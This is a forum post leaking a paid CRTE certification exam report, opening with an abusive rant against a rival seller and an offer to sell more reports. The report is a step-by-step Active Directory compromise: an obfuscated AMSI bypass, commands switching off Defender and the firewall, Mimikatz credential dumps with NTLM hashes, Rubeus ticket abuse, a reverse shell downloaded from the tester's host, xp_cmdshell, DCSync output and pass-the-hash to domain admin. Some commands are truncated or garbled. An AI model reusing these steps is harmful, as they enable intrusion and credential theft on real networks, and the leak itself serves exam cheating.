Hi,

It's maze runner with another leak. This time I bring you the New CRTE Exam Report
(CITADEL.CORP and GLACIS.CORP).

Reason For Leak : The mf from exam market selling it for 400,500 vice versa. Especially the
guy Marble_cig11, I don't like this kinda cunt people. Listen Marble idiot, Don't drag any other
sellers into your sale, You can say you have the best report but doesn't mean you are the one
who has best in the world, You're just another piece of shit for me. If you do it again then
next leak will be your CRTO and PACES report and Your Fake Cobalt Strike, already got those
two waiting for leak.

How this idiot lied to their customers,

CRTE - "I took 8 times CRTE exam to make this report ", "I have the real report, others just
reselling mine", "Me and other shit guy are real, rest of the sellers are scammers." and
finally "I used POM as a MM blah blah"

CRTO - "You need to complile CS binary in VS to evade AV", "Daily having Exams", "blah
blah"

Finally these are the ultimate I own Everything.., If you give me positive rep I'll give you 30
rep.

This guy lies a lot, Don't know about cooling period in CRTE. Besides this Report is same as
the other guy in the market.

Leaks Contributors so far (aka Legends):

1. @leopard_00
2. @MrXmen
3. @samy_le
4. @whoami.01
5. @rangnarok
6. @Adispy
7. @omegade

If you want to buy the Reports for Cheap Price DM me on Discord

maze_runner#0964
 CRTE EXAM REPORT
Introduction
An Active Directory Security Assessment has been conducted on the given Active
Directory Environment assuming an attacker has already got an initial foothold in the
target environment as per the given scope. Social Engineering and DDOS testing
are out of scope for the penetration test. This document is confidential and only
higher authorities of the company are entitled to read this

Scope of Engagement
Machines Provided in the Examination Dashboard:

ExamVM Foothold machine

SRV71 Access obtained

SQLSRV3 Access obtained

GLACIS-DC Access obtained

PAWSRV Access obtained

CITADEL-DC Access obtained

The above defines the machines given in the network. I already got an initial foothold
access in the given network through EXAMVM. I need to get command execution on
the all the machines present in the network .

Intended Audience
The document is prepared for Pentester Academy L.L.C as part of the Certified Red
Team Expert examination.

Executive Summary
Testing was performed in a controlled environment. I confirm I was successfully able
to achieve OS-Command on all the machines in the network.

CRTE EXAM REPORT 1

 Most used commands , not to repeat myself in the report are :

AMSI Bypass :

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','r

E' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}
{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'t
o'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',
('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Pub
l'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Close Firewall :

Set-MpPreference -DisableIOAVProtection $true

Set-MpPreference -DisableRealtimeMonitoring $true

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Or in cmd :

netsh advfirewall set allprofiles state off

Vulnerability report :

EXAMVM

I had to transfer AD-MODULE on the machine to be able to enumerate it using

share of Guacamole (this way I will always transfer my files in the future) .

Import .dll module , and .ps1 module as in the training material course.

CRTE EXAM REPORT 2

 Import-Module Microsoft.ActiveDirectory.Management.dll

Import-Module \ActiveDirectory\ActiveDirectory.psd1

Now I will start enumeration for :

1. User ServicePrincipalName

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

DistinguishedName : CN=krbtgt,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 044cb80a-2a72-4a26-bde8-353d8b3a8df9
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-253487801-221673152-1815095224-502
Surname :
UserPrincipalName :

2. Users

Get-ADUser -Filter *

DistinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500
Surname :
UserPrincipalName :

DistinguishedName : CN=Guest,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : Guest
ObjectClass : user
ObjectGUID : 26bb7559-371b-461d-936a-fcd25c4fad8b
SamAccountName : Guest
SID : S-1-5-21-253487801-221673152-1815095224-501
Surname :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=citadel,DC=corp

CRTE EXAM REPORT 3

 Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 044cb80a-2a72-4a26-bde8-353d8b3a8df9
SamAccountName : krbtgt
SID : S-1-5-21-253487801-221673152-1815095224-502
Surname :
UserPrincipalName :

DistinguishedName : CN=share manager,CN=Users,DC=citadel,DC=corp

Enabled : True
GivenName : share
Name : share manager
ObjectClass : user
ObjectGUID : e3cbc534-0d57-43b9-8911-1fa7f7385660
SamAccountName : sharemanager
SID : S-1-5-21-253487801-221673152-1815095224-1109
Surname : manager
UserPrincipalName : sharemanager

DistinguishedName : CN=sql connector,CN=Users,DC=citadel,DC=corp

Enabled : True
GivenName : sql
Name : sql connector
ObjectClass : user
ObjectGUID : 021fd657-6fa9-478b-8c8f-218a82499854
SamAccountName : sqlconnector
SID : S-1-5-21-253487801-221673152-1815095224-1110
Surname : connector
UserPrincipalName : sqlconnector

DistinguishedName : CN=GLACIS$,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName :
Name : GLACIS$
ObjectClass : user
ObjectGUID : 2b70b2a3-5a9f-461d-830e-7d4906f3300c
SamAccountName : GLACIS$
SID : S-1-5-21-253487801-221673152-1815095224-1111
Surname :
UserPrincipalName :

DistinguishedName : CN=studentuser,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName : studentuser
Name : studentuser
ObjectClass : user
ObjectGUID : ec7c5a26-eb2c-4175-9917-216e1fbb1fbc
SamAccountName : studentuser
SID : S-1-5-21-253487801-221673152-1815095224-1113
Surname :
UserPrincipalName : [email protected]

3. Samaccountnames

CRTE EXAM REPORT 4

 Get-ADUser -Filter * -Properties *| select Samaccountname,Description

Samaccountname Description
-------------- -----------
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain
krbtgt Key Distribution Center Service Account
sharemanager
sqlconnector
GLACIS$
studentuser

4. Computernames

Get-ADComputer -Filter *

DistinguishedName : CN=CITADEL-DC,OU=Domain Controllers,DC=citadel,DC=corp

DNSHostName : citadel-dc.citadel.corp
Enabled : True
Name : CITADEL-DC
ObjectClass : computer
ObjectGUID : aed36284-8dfd-458d-83af-befa42538a21
SamAccountName : CITADEL-DC$
SID : S-1-5-21-253487801-221673152-1815095224-1000
UserPrincipalName :

DistinguishedName : CN=PAWSRV,CN=Computers,DC=citadel,DC=corp
DNSHostName : pawsrv.citadel.corp
Enabled : True
Name : PAWSRV
ObjectClass : computer
ObjectGUID : 6031ac79-7b02-4996-bf53-91de6c0c6066
SamAccountName : PAWSRV$
SID : S-1-5-21-253487801-221673152-1815095224-1104
UserPrincipalName :

DistinguishedName : CN=EXAMVM,CN=Computers,DC=citadel,DC=corp
DNSHostName : examvm.citadel.corp
Enabled : True
Name : EXAMVM
ObjectClass : computer
ObjectGUID : d14c6ca8-f1aa-42a7-b14d-11b4287a3347
SamAccountName : EXAMVM$
SID : S-1-5-21-253487801-221673152-1815095224-1105
UserPrincipalName :

DistinguishedName : CN=SRV71,OU=Servers,DC=citadel,DC=corp
DNSHostName : srv71.citadel.corp
Enabled : True
Name : SRV71
ObjectClass : computer
ObjectGUID : a0b9d4b8-e51b-4421-a6dd-19500a851987
SamAccountName : SRV71$

CRTE EXAM REPORT 5

 SID : S-1-5-21-253487801-221673152-1815095224-1106
UserPrincipalName :

5. Members of Domain Admins

Get-ADGroupMember -Identity 'Domain Admins'

distinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
name : Administrator
objectClass : user
objectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500

6. Members of Enterprise Admins

Get-ADGroupMember -Identity 'Enterprise Admins' -Server citadel.corp

distinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
name : Administrator
objectClass : user
objectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500
SourceName : citadel.corp
TargetName : glacis.corp
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional

7. Trusts

Get-ADTrust -Filter *

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=glacis.corp,CN=System,DC=citadel,DC=corp
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : glacis.corp
ObjectClass : trustedDomain
ObjectGUID : fd4a8a31-c6bb-4a27-97d8-2ff0d543055e
SelectiveAuthentication : False
SIDFilteringForestAware : False

CRTE EXAM REPORT 6

 SIDFilteringQuarantined : False
Source : DC=citadel,DC=corp
Target : glacis.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

8. Forests

Get-ADForest | %{Get-ADTrust -Filter *}

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=glacis.corp,CN=System,DC=citadel,DC=corp
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : glacis.corp
ObjectClass : trustedDomain
ObjectGUID : fd4a8a31-c6bb-4a27-97d8-2ff0d543055e
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=citadel,DC=corp
Target : glacis.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

EXAMVM PRIVILEGE ESCALATIO

Cause I am a low privilege user, I need to escalate my privileges

I can do SharpHound on the EXAMVM after transfering Sharphound.exe like always.

CRTE EXAM REPORT 7

 Sharphound.exe -CollectionMethods -all

!!!! → I made sure that on my personal PC I have the latest version of neo4j and
bloodhound , cause the latest SharpHound.exe got updated couple of weeks ago.

Using Bloodhound on my personal PC as it was recommended in the starting errata

of the exam panel.
After importing the .zip file in Bloodhound (on my personal PC) , checking the
studentuser I saw it has GenericWrite on [email protected].

SO , first thing we add it and give admin rights !

net group "CompanyAdministrators" studentuser /add /domain

CRTE EXAM REPORT 8

 After that I logged out from the EXAMVM .
Now I see that I have full rights and I can spawn CMD or Powershell with Admin
rights.

DUMPING THE HASHES NOW ON EXAMVM! BEFORE DOING THIS I DISABLE

WITH THE CODES I STATED UPPER THE AV / DEFENDER, AMSI PROTECTION !
To be 100% positive, from CMD I started powershell with bypass command :

powershell -ep bypass

I also disabled all security on EXAMVM :

CRTE EXAM REPORT 9

 Set-MpPreference -DisableIOAVProtection $true

Set-MpPreference -DisableRealtimeMonitoring $true

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

I uploaded mimikatz.exe (x64) too, and dumped the hashes :

CRTE EXAM REPORT 10

 So now , I got for sharemanager

NTLM → ad1b41d88cfd57b08f0fb50b1eee2541

GETTING IN SRV71

Having the NTLM hash of sharemanager let’s ask for a ticket to access SERV71 →
We will use Rubeus.exe here

.\Rubeus.exe asktgt /user:sharemanager /rc4:ad1b41d88cfd57b08f0fb50b1eee2541 /ptt

CRTE EXAM REPORT 11

 I checked now to see if it worked with :

klist

Imported PowerView.ps1 and did:

CRTE EXAM REPORT 12

 Find-DomainShare -CheckShareAccess

dir \\srv71.citadel.corp\ScheduledQueries

cd \\srv71.citadel.corp\ScheduledQueries

There is a Queries.ps1 file that when examining runs every 5 minutes.

Checking the content of the Queries.ps1 :

type Queries.ps1

# This PowerShell script runs every 5 minutes to check sqlsrv3 (192.168.37.3) status
Import-Module SqlServer
EXECUTE (
SELECT name AS [sqlsrv3DB],
DATABASEPROPERTY(name, N'Issqlsrv3') AS [sqlsrv3],
DATABASEPROPERTY(name, N'IsOffline') AS [Offline],
DATABASEPROPERTY(name, N'IsEmergencyMode') AS [Emergency],
has_dbaccess(name) AS [HasDBAccess]
FROM sysdatabases

CRTE EXAM REPORT 13

 WHERE (DATABASEPROPERTY(name, N'Issqlsrv3') = 1)
OR (DATABASEPROPERTY(name, N'IsOffline') = 1)
OR (DATABASEPROPERTY(name, N'IsEmergencyMode') = 1)
OR (has_dbaccess(name) = 0)
) AT SQLSRV3
GO
---snip-----
---snip-----

I can attempt to add a reverse shell to this script to get a shell on SRV71 so I
changed it all with this (note : that is powershelltcp.ps1 reverse shell from Nishang,
where I added the last line with my ip and the port I want to get the reverse shell
back) .

iex((new-object system.net.webclient).downloadstring('http://192.168.100.1/powershell.
ps1'))

I uploaded nc64.exe and waited to catch the sell every 5 minutes

Now I am sqlconnector on SRV71 .

Coming back to Bloodhound I noticed SQLSRV3.GLACIS.CORP and GLACIS-DC.GLACIS.CORP

Also this users → [email protected] and [email protected]

CRTE EXAM REPORT 14

 SQL SRV3

I disabled AMSI again (as sqlconnector), just to be sure, and load up PowerUpSQL
to enumerate further.
PowerUpSQL includes functions that support SQL Server discovery, weak
configuration auditing, privilege escalation on scale, and

post exploitation actions such as OS command execution. It is intended to be used

during internal penetration tests and red team

engagements. However, PowerUpSQL also includes many functions that can be

used by administrators to quickly inventory the
SQL Servers in their ADS domain and perform common threat hunting tasks related
to SQL Server.

CRTE EXAM REPORT 15

 Host PowerupSQL.ps1 with HFS.exe

iex((new-object system.net.webclient).downloadstring('http://192.168.100.1/PowerUpSQL.
ps1'))

Get-SQLServerLinkCrawl -Instance sqlsrv3.glacis.corp -Query "SELECT distinct b.name FR

OM sys.server_permissions a INNER JOIN SYS.server_pri

With the last command I see that sqlconnector is sa (administrator) and we can do
more exploiting this .

I first enable XP_CMD Shell on the SQL Server

Get-SQLServerLinkCrawl -Instance sqlsrv3.glacis.corp -Query "EXECUTE AS LOGIN = 'sqlsr

v3adm';EXECUTE AS LOGIN = 'sa';EXEC sp_configure'show

Now with the XP_CMD Shell enabled, and being able to invoke commands (as nt
autrhority\system), for persistence I will add studentuser account to the local
administrators group.

Get-SQLServerLinkCrawl -Instance sqlsrv3.glacis.corp -Query "EXECUTE AS LOGIN = 'sqlsr

v3adm';EXECUTE AS LOGIN = 'sa';EXEC sp_configure'show

CRTE EXAM REPORT 16

 Next move is to get to sqlconnector3 .
I will use “powershell on steroids” as I learned in the training to make things easier
for me

$passwd = convertto-securestring -AsPlainText -Force -String s88LBlxao4cK9U2OCzdbf; $c

red = new-object -typename System.Management.Automation.PSCredential -argumentlist "ci
tadel\studentuser",$passwd; $session = new-pssession -computername SQLSRV3.GLACIS.CORP
-credential $cred

Now I can invoke commands as studentuser on SQLSRV3

SQLSRV3

Checking that I am student user on SQLSRV3

Invoke-Command -Session $session -ScriptBlock {whoami;hostname}

From here I used SafetyKatz.exe (after uploading it in shared as usual) to dump

credentials on SQLSRV3

Invoke-Command -Session $session -ScriptBlock {wget -uri http://192.168.100.1/SafetyKa

tz.exe -outfile Safetykatz.exe}

CRTE EXAM REPORT 17

 Invoke-Command -Session $session -ScriptBlock {.\Safetykatz.exe "privilege::debug" "se
kurlsa::logonpasswords full" "exit"}

LOOT → dbmaster : 1a0693ca4d6482238e5e6f46c36950ea and password → 1SQLSrvAdmin!

From BloodHound , I see that dbmaster has AllowedToDelegate to Glacis-

DC.GLACIS.CORP

CRTE EXAM REPORT 18

 Now I can impersonate Administrator using the has of dbmaster.
First I need to create a new session for powershell on steroids ( $session2 )

$passwd = convertto-securestring -AsPlainText -Force -String 1SQLSrvAdmin!; $cred = ne

w-object -typename System.Management.Automation.PSCredential -argumentlist "citadel\st
udentuser",$passwd; $session2 = new-pssession -computername SQLSRV3.GLACIS.CORP -crede
ntial $cred

Then on the new $session2

Invoke-Command -Session $session2 -ScriptBlock {.\Rubeus.exe asktgt /user:dbmaster /do

main:GLACIS.CORP /ntlm:1a0693ca4d6482238e5e6f46c36950e /outfile:masters5.tgt

Got successfully the masters5.tgt

CRTE EXAM REPORT 19

 GLACIS-DC

My next move is to create the CIFS ticket

Invoke-Command -Session $session2 -ScriptBlock {.\Rubeus.exe s4u /ticket:master5.tgt /

msdsspn:time/glacis-dc.glacis.corp /impersonateuser:Administrator /domain:GLACIS.CORP
/altseervice:CIFS /ptt}

And it got succesfully imported :

CRTE EXAM REPORT 20

 Now I will create a HOST ticket

Invoke-Command -Session $session2 -ScriptBlock {.\Rubeus.exe s4u /ticket:master5.tgt /

msdsspn:time/glacis-dc.glacis.corp /impersonateuser:Administrator /domain:GLACIS.CORP
/altservice:HOST /ptt}

CRTE EXAM REPORT 21

 Also job finished with success.

Double checking if all went well using klist :

Invoke-Command -Session $session2 -ScriptBlock {klist}

CRTE EXAM REPORT 22

 I now have code execution on GLACIS-DC

Invoke-Command -Session $session2 -ScriptBlock {dir \\glacis-dc.glacis.corp\c$}

My next move will be to use PsExec.exe to run commands on GLACIS-DC

Invoke-Command -Session $session2 -ScriptBlock {.\PSexec.exe \\glacis-dc.glacis.corp -

s net localgroup Administrators}

CRTE EXAM REPORT 23

 I will disasble the RealTimeMonitoring, AV, add exclusion patch to C: drive, and
invoke command “whoami” on GLACIS-DC

Invoke-Command -Session $session2 -ScriptBlock {.\PsExec.exe \\glacis-dc.glacis.corp -

s powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreferencese
-DisableIOAWProtection $true; Add-MpPreference -ExclusionPath 'C:\';whoami"

Next I can create a scheduled task that will add dbmaster to the Administrators
group on GLACIS-DC

Invoke-Command -Session $session2 -ScriptBlock {.\PsExec.exe \\glacis-dc.glacis.corp c

md /c schtasks /create /S glacis-dc.glacis.corp /SC minute /RU "NT Authority\SYSTEM" /
TN "adduser" /TR "cmd /c net localgroup administrators glacis\dbmaster /add"}

Double checked to see if is truly succesfull.

Invoke-Command -Session $session2 -ScriptBlock {.\PsExec.exe \\glacis-dc.glacis.corp c

md /c "net localgroup administrators > c:\dbmaster.txt"}

Now that dbmaster is local administrator, I can create PSRemote session to

GLACIS-DC from SRV71 as dmbaster user.
So I will open with powershell on steroids a new sessions , called $session3:

$passwd = convertto-securestring -AsPlainText -Force -String 1SQLSrvAdmin!;$cred = new

-object -typename System.Management.Automation.PSCredential -argumentlist "GLACIS.corp

CRTE EXAM REPORT 24

 \dbmaster",$passwd; $session3 = new-pssession -computername glacis-dc.GLACIS.CORP -cre
dential $cred

Double checking as usual

Invoke-Command -Session $session3 -ScriptBlock {whoami;hostname}

PAWSRV

Checking BloodHound more , we see that GLACIS-DC.GLACIS.CORP is able to add

user to the group [email protected]

Dumping hashes did not find anything of value but we do see that the pawsrv has
DCSYNC Rights from our Bloodhound enumerations but will need to add our
studentuser account to the local admin group on PAWSRV in order to attack this.

CRTE EXAM REPORT 25

 I can add studentuser to the local administrators group using a scheduled task.

I create a powershell script to add use studentuser and name it useradd.ps1

$User = Get-ADUser -Identity "CN=STUDENTUSER,CN=USERS,DC=CITADEL,DC=CORP" -Server "CIT

ADEL.CORP"; $Group = Get-ADGroup -Identity "CN=PAWADM

Then using $session2, I upload it and copy it to GLACIS-DC root.

Invoke-Command -Session $session2 -ScriptBlock {wget -uri http://192.168.100.1/userad

d.ps1 -outfile useradd.ps1}

Invoke-Command -Session $session2 -ScriptBlock {copy useradd.ps1 \\glacis-dc.glacis.co

rp\c$}

Then I create the scheduled task on GLACIS-DC

Invoke-Command -Session $session3 -ScriptBlock {schtasks /create /S glacis-dc.glacis.c

orp /SC minute /RU "NT Authority\SYSTEM" /TN "adduse2" /TR "powershell -c C:\useradd.p
s1; copy C:\useradd.ps1 C:\useradd2.ps1"}

CRTE EXAM REPORT 26

 I now verify that the studentuser account was added with PowerView (after importing
it, I will run the following command) :

Get-NetGroupMember -Identity "pawadmins"

I can now access PAWSRV from EXAMVM using Winrs

winrs -r:pawsrv powershell

CITADEL-DC

Using the winrm shell I disable all the security first using the AMSI code , and the
rest stated at the start of the report .

I can now use SafetyKatz to perform a DCSYNC attack. I winrs to PAWSRV and
dump all hashes.

CRTE EXAM REPORT 27

 PS C:\Users\studentuser\Documents> .\SafetyKatz.exe "privilege::debug" "token::elevat
e" "lsadump::dcsync /user:CITADEL\Administrator" "exit
.\SafetyKatz.exe "privilege::debug" "token::elevate" "lsadump::dcsync /user:CITADEL\Ad
ministrator" "exit"
[*] Dumping lsass (672) to C:\Windows\Temp\debug.bin
[+] Dump successful!
[*] Executing loaded Mimikatz PE
.#####. mimikatz 2.2.0 (x64) #19041 Sep 21 2021 15:08:31
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
580 {0;000003e7} 1 D 13985 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;001b61bc} 0 D 1917043 CITADEL\studentuser S-1-5-21-253487801-2216
73152-1815095224-1113 (11g,24p) Prim
* Thread Token : {0;000003e7} 1 D 1932307 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Imper
sonation (Delegation)
mimikatz(commandline) # lsadump::dcsync /user:CITADEL\Administrator
[DC] 'citadel.corp' will be the domain
[DC] 'citadel-dc.citadel.corp' will be the DC server
[DC] 'CITADEL\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/24/2022 9:19:12 AM
Object Security ID : S-1-5-21-253487801-221673152-1815095224-500
Object Relative ID : 500
Credentials:
Hash NTLM: 2e52650081016fcefc5c2100ddf1566c
ntlm- 0: 2e52650081016fcefc5c2100ddf1566c
ntlm- 1: bcecf7d2efeb76139da904fb78158178
lm - 0: bebea018e95e9cbaab350c6e9f5a17e5
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 1fc33d58108520a64d25db5c4ad7d6e5
* Primary:Kerberos-Newer-Keys *
Default Salt : CITADEL.CORPAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f010371c54fa0ac5bb3fe2b37252641334ae3a7c21ecb2486f4f3eca8e22d176
aes128_hmac (4096) : a808ba766be3efb4d3c80d6de0fd7b5f
des_cbc_md5 (4096) : 6b52e33dbc948ccd

CRTE EXAM REPORT 28

 OldCredentials
aes256_hmac (4096) : 476acd473ba6f7ed90539e139c7c2832bb3501fff49d41831353efd15e6a766c
aes128_hmac (4096) : 60993e9f10913c80d50111232f722f6d
des_cbc_md5 (4096) : cd7f4c4a5d7aec9e
OlderCredentials
aes256_hmac (4096) : 5f1cf251cd62c9506b27e6ae518efdc63eeb6673c35186c26b102177979066c7
aes128_hmac (4096) : a5d261be5494386ed065897dc4ee0650
des_cbc_md5 (4096) : 0798da2315980d68
* Primary:Kerberos *
Default Salt : CITADEL.CORPAdministrator
Credentials
des_cbc_md5 : 6b52e33dbc948ccd
OldCredentials
des_cbc_md5 : cd7f4c4a5d7aec9e
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 e53ce05adcbd404bb95a1e6816fabfbc
02 6057f64c999440c16c06f6a44cb0043a
03 21fc4e1104309023fdbfc2203a382b6a
04 e53ce05adcbd404bb95a1e6816fabfbc
05 367392f252ef224b11286e58aac0f68e
06 b472e16bfa3c2a214d230fb75f2339ff
07 b528d4245c48d6f9675055745b31e19b
08 7ae82e82b37d3588427472aaba0dd9e6
09 78d957140dd0c58e42ee7b7bf0d03ade
10 663cd323e464381004c6d1700ec8996
11 f64744c7690e2511f73725f24aad52d7
12 7ae82e82b37d3588427472aaba0dd9e6
13 be40db9107577efda2a080eb85ffce0c
14 e301b4edd3b8fcb5ada4b6db2d765d95
15 62806b2600a8629642d0496ad3ad4991
16 41c00a01d9d56f7f039b5141a7bbdb7e
17 e0ddcd04318739e21b673f7dddcdc498
18 454800ff4a8f45f201a3076df0af38a3
19 851410e58bd0300bf70732d5409e10c5
20 01ae4dd0be3d1da94d6031e0b1160b1f
21 1eaf0d0be1a3a64f55cf70d847f2915a
22 fceedccd121e56ab653dae7942fc9f16
23 2cb9de183a3f6058585751d3ca247584
24 dc35e7c7e7cf95d2f4d075b3ff852b25
25 8f5ddd816cac0df6a6334cf1a17c609a
26 411caa3c5a508b13d0d4ef91965e0cd4
27 3fe4e5dda5ccfe076043a810e48dc129
28 195841778626085fb3d3a66129a82426
29 139c871b143ee29e38586a80958229b7
mimikatz(commandline) # exit
Bye!

LOOT → Administrator : 2e52650081016fcefc5c2100ddf1566c

With that I can open a powershell on our EXAMVM and use SafetyKatz again to
pass the hash.

CRTE EXAM REPORT 29

 .\SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:CITADEL /rc4:2e52650081016
fcefc5c2100ddf1566c /run:cmd.exe" "exit"

This opens a CMD window as in which we can winrs to CITADEL-DC.

We are now Domain Admins and have full controll to do what ever we like such as a
Golden Ticket attack for persistence.

Now as a final step I add the studentuser to the Domain Admins

net group "Domain Admins" studentuser /add /domain

CRTE EXAM REPORT 30

 Conclusion
I have successfully achieved command execution on all the machines and
henceforth accomplishing the passing requirement of the examination.

CRTE EXAM REPORT 31